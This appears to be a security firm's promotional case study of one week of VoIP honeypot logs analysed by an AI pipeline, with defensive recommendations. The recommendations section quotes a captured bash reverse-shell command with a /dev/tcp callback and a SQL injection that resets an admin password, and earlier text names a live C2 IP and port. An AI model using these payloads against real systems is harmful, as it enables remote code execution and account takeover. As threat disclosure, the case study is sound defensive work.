// case study

VoIP Threat Analysis

One week. Public SIP endpoint. Two injection-in-header attacks.

Attack Surface Discovery

Most organizations audit their web stack, their APIs, their cloud configs. Nobody audits their SIP stack.

We ran a VoIP honeypot against the open internet for one week. In that time, a tool called EagleSIP sent a REGISTER request with a SQL injection payload embedded in the From: header — targeting backends that pass SIP headers directly into database queries. A separate attacker embedded a bash reverse shell in an INVITE From: header, pointing back to a live C2 at 216.126.227.195:3456.

Neither of these would trigger a standard WAF rule. Neither would appear in most SIEM dashboards. Both are real, active attack patterns running against any public SIP endpoint right now.

That's what a targeted attack surface assessment finds. Not theoretical CVEs — actual payloads in the wild, aimed at your stack.

AI-Assisted Threat Analysis

A week of VoIP honeypot traffic produces over 1,000 log lines. Most of it is noise — scanners, probes, malformed packets. Sorting signal from noise manually takes hours and still misses things.

We ran the raw Kamailio logs through an AI analysis pipeline. It surfaced two critical findings a human analyst would likely have dismissed as parse errors: a SQL injection attempt and a bash reverse shell, both injected into SIP From: headers. It also identified a coordinated INVITE flood from a single IP across 10 simultaneous source ports — a toll fraud enumeration pattern — and a deliberate Content-Length: 0 fuzzing campaign probing for parser crashes.

The AI didn't just find the attacks. It grouped them by attacker, mapped their intent (credential theft, RCE, DoS, fraud), and produced a prioritized risk summary — in minutes, not days.

That's the difference between logging everything and actually knowing what's in your logs.

Prioritized Defense Recommendations

Not all threats deserve the same response. After analyzing one week of VoIP honeypot data, here's the actual priority order — and why.

Immediate Sanitize every SIP header field before it touches your backend. The From:, To:, Contact:, and Via: headers are all injection vectors. One attacker this week embedded bash -i >& /dev/tcp/[C2]:3456 0>&1 in a From: header. Unsanitized, that's remote code execution.

High Parameterize every query that touches SIP data. We captured UPDATE users SET password='123456789ttt' WHERE username='admin' injected via From: header by EagleSIP — a purpose-built VoIP attack framework.

Medium Rate-limit INVITE requests per source IP. One host sent 46 malformed INVITEs across 10 parallel ports — the signature of automated toll fraud enumeration. A SIP-aware fail2ban rule stops this cold.

Low Block Content-Length: 0 on SIP INVITE — it's a known parser fuzzing technique with no legitimate use case.

We deliver this kind of analysis as a one-time assessment or ongoing monitoring. The honeypot stays running. The AI keeps reading it.